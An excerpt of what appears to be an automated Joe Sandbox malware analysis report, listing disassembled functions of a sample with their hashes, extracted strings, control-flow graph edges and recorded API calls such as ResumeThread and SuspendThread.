                                                                • Opcode Fuzzy Hash: 43f3edb788e06496a9a2c65fa3add34625278db72b2baa5253a39444bb1c495f
                                                                • Instruction Fuzzy Hash: 2E43DD70A155198FEB94EB14C899BAAB7B2FF48304F5041F9D40EA7292DF396E81CF44
                                                                Function 00007FF8490D31F2 Relevance: 19.2, Strings: 15, Instructions: 432COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D;I$ F;I$0D;I$0F;I$@D;I$@F;I$PD;I$PE;I$PF;I$`D;I$`E;I$`F;I$pD;I$pE;I$E;I
                                                                • API String ID: 0-399666217
                                                                • Opcode ID: d319f4da021ab77225e8a773053483196d18830467118c7b67e13c8663ea5534
                                                                • Instruction ID: c32ab26287e0922b46d675854f7be4c86e238820b4acf832d4230a8bd07bcac3
                                                                • Opcode Fuzzy Hash: d319f4da021ab77225e8a773053483196d18830467118c7b67e13c8663ea5534
                                                                • Instruction Fuzzy Hash: 22F1E922D0E6D29FE752AF78A8951E57F70FF1375871902F7C1844E087DA2CB8058399
                                                                Function 00007FF8490D38F2 Relevance: 12.7, Strings: 10, Instructions: 181COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (m;I$(s;I$(t;I$(v;I$8p;I$Pl;I$Pn;I$pm;I$ps;I$x;I
                                                                • API String ID: 0-1754061288
                                                                • Opcode ID: 926eada36f80819fdc375e86dabc15034a6108980b6144b5de8758793aab25ff
                                                                • Instruction ID: 2201bcf44662b7037afd710deb66cd0ef76d0108846f6505edd01382d64a7254
                                                                • Opcode Fuzzy Hash: 926eada36f80819fdc375e86dabc15034a6108980b6144b5de8758793aab25ff
                                                                • Instruction Fuzzy Hash: 27613826E0EAC28FF7669E386854135BFA4FF5369870902FAC1444F4CBC428ED05C386
                                                                Function 00007FF8490D2CC8 Relevance: .4, Instructions: 428COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e68063de4f975bcd349b975f09eb5cfb9f2955fb0687614ccf9a6670ccde3ce
                                                                • Instruction ID: 05feb54023bb1020ed93a8c5be108c112a3931447e7319954194653292e89f9a
                                                                • Opcode Fuzzy Hash: 2e68063de4f975bcd349b975f09eb5cfb9f2955fb0687614ccf9a6670ccde3ce
                                                                • Instruction Fuzzy Hash: 30E1DA22D0E6D29FF352AF7CA8511E67FB4FF5266870902B7C1884B19BD92CA805C3D5
                                                                Function 00007FF8490D4978 Relevance: .3, Instructions: 344COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 708456b2dd76068b1da296b409bca08e2aa53bcf936dbc69b44ce521983e83b0
                                                                • Instruction ID: 0afd7381635d9eb983778018d3fbe6f8a552f8085688158094ab67097e362fd3
                                                                • Opcode Fuzzy Hash: 708456b2dd76068b1da296b409bca08e2aa53bcf936dbc69b44ce521983e83b0
                                                                • Instruction Fuzzy Hash: 74C1D516E0F9C25FEB525A78182A1B67FB9BF2358870E55F6C1C40BACBA524ED05C3C4
                                                                Function 00007FF8490C5E55 Relevance: .2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee7434150a903f449033b6be559e99b463c5a8f6a458aadb0c11066e62c9d576
                                                                • Instruction ID: 0c397f3b3a8bff00748527102cb502eb74c72cb5afb39a97d69bd9bb6e2cbbb9
                                                                • Opcode Fuzzy Hash: ee7434150a903f449033b6be559e99b463c5a8f6a458aadb0c11066e62c9d576
                                                                • Instruction Fuzzy Hash: 4F41FA66D0E7D25FD326EE78D8D14D27FA0EF0229871D01B7C088CA183EA0DE51A87E5
                                                                Function 00007FF8490CB81D Relevance: .1, Instructions: 100COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a554b22d905ff91179ddf8d8636513aec6f2807abb0f73ed12dcb0d07c8adc0a
                                                                • Instruction ID: d1a8756eb333c2c723925085bdb8588ad5c033cdbc4c581c68ec855a77a13fab
                                                                • Opcode Fuzzy Hash: a554b22d905ff91179ddf8d8636513aec6f2807abb0f73ed12dcb0d07c8adc0a
                                                                • Instruction Fuzzy Hash: 4631D274D18A5D8FCF88EF98D491AADBBF1FB69300F2011AAD419E3281C735A941CB44
                                                                Function 00007FF8490D3C71 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cd10a111bfe0b7971b4d9c6fe1837aea6d83e0bfa0b2cf8661628cefef2e543
                                                                • Instruction ID: b8086d6f989494ec68f1f1aa2b57f520aa527965eb699a62fe8d13acc549b4f1
                                                                • Opcode Fuzzy Hash: 0cd10a111bfe0b7971b4d9c6fe1837aea6d83e0bfa0b2cf8661628cefef2e543
                                                                • Instruction Fuzzy Hash: F401403541EB16BEC340EAA4E4C05E6B360FF05358B654676C2498AC42CB29F0A29BE4
                                                                Function 00007FF848F209B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c9$!k9$"s9$#{9
                                                                • API String ID: 0-1692736845
                                                                • Opcode ID: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
                                                                • Instruction ID: 0681076a377dcda6742e77cbd2865407bc82f9de8890ac9bb63ac41a2e4d4c9f
                                                                • Opcode Fuzzy Hash: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
                                                                • Instruction Fuzzy Hash: 88414D17A2F562AAE15137BDB4412EEABA4EF812BDF484777E14C8D0C34E0C648582FD

                                                                Execution Graph

                                                                Execution Coverage:2.9%
                                                                Dynamic/Decrypted Code Coverage:75%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:12
                                                                Total number of Limit Nodes:0
                                                                execution_graph 38660 7ff8490f0915 38661 7ff8490f092f GetFileAttributesW 38660->38661 38663 7ff8490f09f5 38661->38663 38672 7ff8490eea60 38673 7ff8490eea6a ResumeThread 38672->38673 38675 7ff8490eeb74 38673->38675 38664 7ff8490ed1fd 38665 7ff8490ed20b SuspendThread 38664->38665 38667 7ff8490ed2e4 38665->38667 38668 7ff8490eebc9 38669 7ff8490eebd7 CloseHandle 38668->38669 38671 7ff8490eecb4 38669->38671

                                                                Executed Functions

                                                                Function 00007FF849642B5F Relevance: .7, Instructions: 738COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cfda9769cc80804722f1ea4770dd18d1600550632a3a1d0c00ec181824223882
                                                                • Instruction ID: 7ab17a9233b3c1d2d9e3bc6df8568d0c6b0bac134421fc5a603f2b10a7d68353
                                                                • Opcode Fuzzy Hash: cfda9769cc80804722f1ea4770dd18d1600550632a3a1d0c00ec181824223882
                                                                • Instruction Fuzzy Hash: 2152A23091C6998FEB6DEF58C4956B97BA1FF44340F6045BDD40ECB28ACB38A981CB44
                                                                Function 00007FF848F40D68 Relevance: .3, Instructions: 271COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3385800716.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff848f40000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1285afcba82434f2631286c3db31e29ed16f81bbc3907ddc0eb83d279e6a43ac
                                                                • Instruction ID: 25223c6a2e5759e15a2e106eba5d498b4956aa23b0cc6ba73303b221db5d2f11
                                                                • Opcode Fuzzy Hash: 1285afcba82434f2631286c3db31e29ed16f81bbc3907ddc0eb83d279e6a43ac
                                                                • Instruction Fuzzy Hash: A6A1EF7091CA8A9FE799EB68C8553A97FF1FBA6350F00017AC009E72D6CFB81855CB50
                                                                Function 00007FF849650A3E Relevance: 3.1, Strings: 2, Instructions: 632COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 7ff849650a3e-7ff849650a4a 2 7ff849650a4c-7ff849650a8a 0->2 3 7ff849650a95-7ff849650aca 0->3 23 7ff849650a8c-7ff849650a93 2->23 24 7ff849650ad5-7ff849650aea 2->24 15 7ff849650acc-7ff849650ad1 3->15 16 7ff849650b15-7ff849650b1a 3->16 22 7ff849650b0c-7ff849650b0e 15->22 17 7ff849650b1c-7ff849650b2e 16->17 18 7ff849650b65-7ff849650b77 16->18 32 7ff849650b35-7ff849650b41 17->32 31 7ff849650b7c-7ff849650b9a 18->31 22->16 23->3 24->32 33 7ff849650aec-7ff849650b06 24->33 41 7ff849650b9c-7ff849650ba3 31->41 42 7ff849650be5-7ff849650c1a 31->42 32->31 37 7ff849650b43-7ff849650b5a 32->37 33->22 45 7ff849650b5c-7ff849650b64 37->45 46 7ff849650ba5-7ff849650bda 37->46 41->46 57 7ff849650c1c-7ff849650c24 42->57 58 7ff849650c65-7ff849650c77 42->58 45->18 61 7ff849650bdc-7ff849650be3 46->61 62 7ff849650c25-7ff849650c41 46->62 57->62 67 7ff849650c7b-7ff849650ca3 58->67 61->42 62->67 71 7ff849650c43-7ff849650c5a 62->71 77 7ff849650ca5-7ff849650d0a 67->77 71->77 78 7ff849650c5c-7ff849650c64 71->78 85 7ff849650d0c-7ff849650d28 77->85 86 7ff849650d55 77->86 78->58 92 7ff849650d65-7ff849650d73 85->92 94 7ff849650d2a 85->94 87 7ff849650d56 86->87 88 7ff849650d57-7ff849650d5e 86->88 87->88 88->92 97 7ff849650d75-7ff849650d7a 92->97 96 7ff849650d2c-7ff849650d49 94->96 94->97 104 7ff849650d82-7ff849650d8a 96->104 122 7ff849650d4b-7ff849650d50 96->122 99 7ff849650d7c-7ff849650d81 97->99 100 7ff849650dc5-7ff849650dd1 97->100 99->104 105 7ff849650e09-7ff849650e12 100->105 109 7ff849650d8c-7ff849650dc2 104->109 110 7ff849650dd5-7ff849650dda 104->110 106 7ff849650e5d-7ff849659a46 105->106 107 7ff849650e14-7ff849650e22 105->107 140 7ff849659a47 106->140 119 7ff849650e6d-7ff849650e77 107->119 120 7ff849650e24 107->120 109->100 115 7ff849650ddc-7ff849650ddf 110->115 116 7ff849650e25-7ff849650e3a 110->116 115->105 130 7ff849650e3c-7ff849650e41 116->130 131 7ff849650e85-7ff849650e93 116->131 127 7ff849650e79-7ff849650e7e 119->127 120->116 122->86 127->131 130->127 139 7ff849650e43-7ff849650e4a 130->139 136 7ff849650e95-7ff849650ea4 131->136 144 7ff849650ea5-7ff849650eca 136->144 139->136 142 7ff849650e4c-7ff849650e5a 139->142 140->140 142->144 145 7ff849650e5c 142->145 149 7ff849650ecc-7ff849650f09 144->149 150 7ff849650f15-7ff849650f2a 144->150 145->106 157 7ff849650f83-7ff849650f91 149->157 152 7ff849650f2c-7ff849650f9f 150->152 153 7ff849650f75-7ff849650f7a 150->153 165 7ff849650fa1-7ff849650fa5 call 7ff84964c180 152->165 156 7ff849650fac-7ff849650fc3 153->156 159 7ff849650fc9-7ff849650fcd 156->159 159->157 167 7ff849650faa 165->167 167->153
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8^eI$`6yI
                                                                • API String ID: 0-485061400
                                                                • Opcode ID: d9f5119209c60e807cca12063a038eae71cbae1e9e490ffbb53535f2c5ec265b
                                                                • Instruction ID: 514f9233769498c85dc8a221ac4e7f2a12e24eba43cf26550b0975d575180e6f
                                                                • Opcode Fuzzy Hash: d9f5119209c60e807cca12063a038eae71cbae1e9e490ffbb53535f2c5ec265b
                                                                • Instruction Fuzzy Hash: 98128932D0F6D69FE361BF68A8550F6BBA0EF027A8B1841B7D08C8E093DD1DA4458755
                                                                Function 00007FF84964C784 Relevance: 2.8, Strings: 2, Instructions: 314COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PnI$\^H
                                                                • API String ID: 0-1942866696
                                                                • Opcode ID: 672b67ffdb1bfaab55bac3e930bd305dfdd73e41de3b7063f001619c232f9097
                                                                • Instruction ID: a72fd4ce3b1d20c9761bfdd7b3c1097584fec9091a501b1ab61d86db86407727
                                                                • Opcode Fuzzy Hash: 672b67ffdb1bfaab55bac3e930bd305dfdd73e41de3b7063f001619c232f9097
                                                                • Instruction Fuzzy Hash: C7A1B231A0DA8A8FD755EFA888546F87BE1FF55340F0942BAC04DC7292DF2CA8458755
                                                                Function 00007FF8498856DD Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 235 7ff8498856dd-7ff84988571c call 7ff8498833f8 239 7ff849885721-7ff849885763 call 7ff8498840c0 235->239 242 7ff849885769-7ff849885773 239->242 243 7ff849884171-7ff84988417b 239->243 242->243 244 7ff84988417d-7ff849886e68 243->244 245 7ff84988419b-7ff849886e0b 243->245 244->243 255 7ff849886e6e-7ff849886e78 244->255 249 7ff849886e0d 245->249 250 7ff849886e12-7ff849886e2b 245->250 249->250 250->243 255->243
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3406849623.00007FF849880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849880000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 9$U
                                                                • API String ID: 0-1041384400
                                                                • Opcode ID: 2e60e180ea308e3ed6006cba7f8a331fe931d21955b82598f5cbc91e99ef1f84
                                                                • Instruction ID: d1defc7d9114072dec559bffd0e1906751bf6ef702aefd5f84ed69b6a86ef070
                                                                • Opcode Fuzzy Hash: 2e60e180ea308e3ed6006cba7f8a331fe931d21955b82598f5cbc91e99ef1f84
                                                                • Instruction Fuzzy Hash: BD111F70A186598FDB64EF18CC957A8B7F0FF54741F1041EAD40DA3295CB786AC18F51
                                                                Function 00007FF84964E542 Relevance: 1.8, Strings: 1, Instructions: 564COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 256 7ff84964e542-7ff84964e549 257 7ff84964e54f-7ff84964e581 call 7ff84964e2e0 call 7ff84964e1b0 256->257 258 7ff84964e765-7ff84964e776 256->258 257->258 265 7ff84964e587-7ff84964e5d9 call 7ff84964e2e0 call 7ff84964e1b0 257->265 259 7ff84964e77d-7ff84964e788 258->259 260 7ff84964e778 258->260 260->259 265->258 272 7ff84964e5df-7ff84964e624 call 7ff84964e2e0 265->272 278 7ff84964e694-7ff84964e6d0 call 7ff8496499f0 272->278 279 7ff84964e626-7ff84964e63a call 7ff84964e1b0 272->279 291 7ff84964e709-7ff84964e710 call 7ff849648a20 278->291 279->258 285 7ff84964e640-7ff84964e663 call 7ff84964e2e0 279->285 289 7ff84964e669-7ff84964e679 285->289 290 7ff84964e835-7ff84964e84c 285->290 289->290 292 7ff84964e67f-7ff84964e692 289->292 296 7ff84964e84e 290->296 297 7ff84964e84f-7ff84964e85d 290->297 295 7ff84964e715-7ff84964e71a 291->295 292->278 292->279 298 7ff84964e71c-7ff84964e71e 295->298 299 7ff84964e6d2-7ff84964e6f2 295->299 296->297 301 7ff84964e85f 297->301 302 7ff84964e865 297->302 298->258 303 7ff84964e720-7ff84964e723 298->303 299->290 300 7ff84964e6f8-7ff84964e703 299->300 300->291 304 7ff84964e7eb-7ff84964e7ff 300->304 301->302 305 7ff84964e869-7ff84964e87a 302->305 306 7ff84964e867 302->306 307 7ff84964e729-7ff84964e744 303->307 308 7ff84964e725 303->308 309 7ff84964e806-7ff84964e811 304->309 310 7ff84964e801 304->310 313 7ff84964e87c-7ff84964e8a8 305->313 314 7ff84964e8c5-7ff84964e8cf 305->314 306->305 312 7ff84964e8a9 306->312 307->290 311 7ff84964e74a-7ff84964e763 call 7ff84964e1b0 307->311 308->307 310->309 311->258 325 7ff84964e789-7ff84964e7a2 call 7ff84964e2e0 311->325 317 7ff84964e8aa-7ff84964eaea 312->317 313->312 313->317 318 7ff84964eaef-7ff84964eaf2 314->318 319 7ff84964e8d5-7ff84964e8da 314->319 321 7ff84964eaf3-7ff84964eaf5 318->321 322 7ff84964e9e6 319->322 323 7ff84964e8e0-7ff84964eb29 319->323 324 7ff84964ea0f-7ff84964ea16 322->324 328 7ff84964e9e8-7ff84964ea01 324->328 329 7ff84964ea18-7ff84964ea33 call 7ff8496499f0 324->329 325->290 338 7ff84964e7a8-7ff84964e7af 325->338 335 7ff84964eb75-7ff84964eb85 328->335 336 7ff84964ea07-7ff84964ea0c 328->336 339 7ff84964ea38-7ff84964ea63 329->339 342 7ff84964eb88-7ff84964eb9a 335->342 343 7ff84964eb87 335->343 336->324 341 7ff84964e7d9-7ff84964e7e1 338->341 359 7ff84964ea8c-7ff84964ea92 339->359 344 7ff84964e7b1-7ff84964e7cd 341->344 345 7ff84964e7e3-7ff84964e7e9 341->345 348 7ff84964eb9c-7ff84964ebd7 342->348 349 7ff84964ebe5-7ff84964ec3b 342->349 343->342 344->290 350 7ff84964e7cf-7ff84964e7d7 344->350 345->304 346 7ff84964e812 345->346 346->290 348->349 356 7ff84964ec40-7ff84964ec47 349->356 350->341 356->356 358 7ff84964ec49-7ff84964efd6 356->358 362 7ff84964ea99-7ff84964ea9f 359->362 364 7ff84964ea65-7ff84964ea7e 362->364 365 7ff84964eaa1-7ff84964eaa6 362->365 364->335 367 7ff84964ea84-7ff84964ea89 364->367 368 7ff84964eaac-7ff84964eab7 365->368 369 7ff84964e993 365->369 367->359 368->321 372 7ff84964eab9-7ff84964eae1 call 7ff8496499f0 368->372 370 7ff84964e9c1-7ff84964e9d8 369->370 370->362 373 7ff84964e9de-7ff84964e9e4 370->373 373->322 374 7ff84964e995 373->374 374->370 377 7ff84964eb68-7ff84964eb6d 374->377 377->335
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 621785fa1d55edeb32a1c5c6e1dab191ab84b5da4087d5467e7329dec1adf831
                                                                • Instruction ID: 5fb37a3bea7b48bd01be3dd8aed5f8ac0ac7ce6549e3a37df22172b4426877a0
                                                                • Opcode Fuzzy Hash: 621785fa1d55edeb32a1c5c6e1dab191ab84b5da4087d5467e7329dec1adf831
                                                                • Instruction Fuzzy Hash: 1F12E530D0CA8A9FE75AEFA8C5586B9BBA0FF54340F14457AD04EC76C2CB38A851CB55
                                                                Function 00007FF8490EEA60 Relevance: 1.7, APIs: 1, Instructions: 162threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 379 7ff8490eea60-7ff8490eea99 381 7ff8490eea9c-7ff8490eeb72 ResumeThread 379->381 382 7ff8490eea9b 379->382 386 7ff8490eeb74 381->386 387 7ff8490eeb7a-7ff8490eebc4 381->387 382->381 386->387
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: d6cb49f854a0ba6331f65617a233b8d807e2f940bcbcd8ab0b3d2d0566b4ec2d
                                                                • Instruction ID: f4327770449030271b7fcef18b77ed37d242e57b5de2b4a1914164e429f08b58
                                                                • Opcode Fuzzy Hash: d6cb49f854a0ba6331f65617a233b8d807e2f940bcbcd8ab0b3d2d0566b4ec2d
                                                                • Instruction Fuzzy Hash: DF516B7090D78C8FDB55DFA8D858AE9BFF0EF56310F0441ABD049D7292CA79A846CB11
                                                                Function 00007FF8490ED1FD Relevance: 1.6, APIs: 1, Instructions: 139threadinjectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 390 7ff8490ed1fd-7ff8490ed209 391 7ff8490ed214-7ff8490ed2e2 SuspendThread 390->391 392 7ff8490ed20b-7ff8490ed213 390->392 396 7ff8490ed2e4 391->396 397 7ff8490ed2ea-7ff8490ed334 391->397 392->391 396->397
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: SuspendThread
                                                                • String ID:
                                                                • API String ID: 3178671153-0
                                                                • Opcode ID: 1981cf82fe473d6a803d0de64416cbc082ad66a097689def8ea5865b8cdb3bdb
                                                                • Instruction ID: ce808da6a20ded8eb86cf402fd7232875a81277a133f74109a575bcedd26da9d
                                                                • Opcode Fuzzy Hash: 1981cf82fe473d6a803d0de64416cbc082ad66a097689def8ea5865b8cdb3bdb
                                                                • Instruction Fuzzy Hash: 09413970D0864C8FDF99DFA8D885AADBBF0FB5A310F10416ED049E7252DA74A885CB45
                                                                Function 00007FF8490F0915 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 400 7ff8490f0915-7ff8490f09f3 GetFileAttributesW 404 7ff8490f09f5 400->404 405 7ff8490f09fb-7ff8490f0a39 400->405 404->405
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 09323c10fb7705f82498ee9a8ca1f713012cd699ac8726d38573709255522602
                                                                • Instruction ID: 6812e8a03d032f79ad5e4bcbbc0093b2d6c205ce0dec473d86e8c5180619bbff
                                                                • Opcode Fuzzy Hash: 09323c10fb7705f82498ee9a8ca1f713012cd699ac8726d38573709255522602
                                                                • Instruction Fuzzy Hash: FA411970A0864C8FDB98EF98D889BEDBBF0FB59310F10416ED049E7252DA74A885CF40
                                                                Function 00007FF849647670 Relevance: 1.6, Strings: 1, Instructions: 316COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HtdI
                                                                • API String ID: 0-579680469
                                                                • Opcode ID: 08b92cf74ae63247e91bf3e4322d4a792b2034c663190dc63066454da4fa581b
                                                                • Instruction ID: 3d1d062c0144d18b82b2115d397adc93558f21b047a81feb9294436cb3ea9a19
                                                                • Opcode Fuzzy Hash: 08b92cf74ae63247e91bf3e4322d4a792b2034c663190dc63066454da4fa581b
                                                                • Instruction Fuzzy Hash: 64A1C431D1CA8A8FE778EF98A4515B9B7A0FF45390F24057ED44EC7282DF29B8468742
                                                                Function 00007FF84964C399 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{wI
                                                                • API String ID: 0-1212038778
                                                                • Opcode ID: 8f5653e2c506e77c29b5b5be3d98c378bc7e7e9f34deef5e2d51f358c0de14a6
                                                                • Instruction ID: 8ccf1a0abd1e04347966e19303ed3599732532549d7c74af99fcab6241805efd
                                                                • Opcode Fuzzy Hash: 8f5653e2c506e77c29b5b5be3d98c378bc7e7e9f34deef5e2d51f358c0de14a6
                                                                • Instruction Fuzzy Hash: 23712631D1DA8E9FE764EFA8D8466FD7BB0FF44390F14027AD009D7292EB2868418794
                                                                Function 00007FF84964064B Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X;bI
                                                                • API String ID: 0-1594360369
                                                                • Opcode ID: c9382d4336db8a802f3616b86dcec632772ff2bbbbdc8463c5b7a364e57a1d07
                                                                • Instruction ID: ce341ccd5ec6c7db7588620d13884924db1560efbce012fba9c7898374481a13
                                                                • Opcode Fuzzy Hash: c9382d4336db8a802f3616b86dcec632772ff2bbbbdc8463c5b7a364e57a1d07
                                                                • Instruction Fuzzy Hash: BA71C131D1D69A9EEB69EFA488546BD7BB0EF55380F1404BAD00EC7183EF286841CB56
                                                                Function 00007FF8496849A0 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
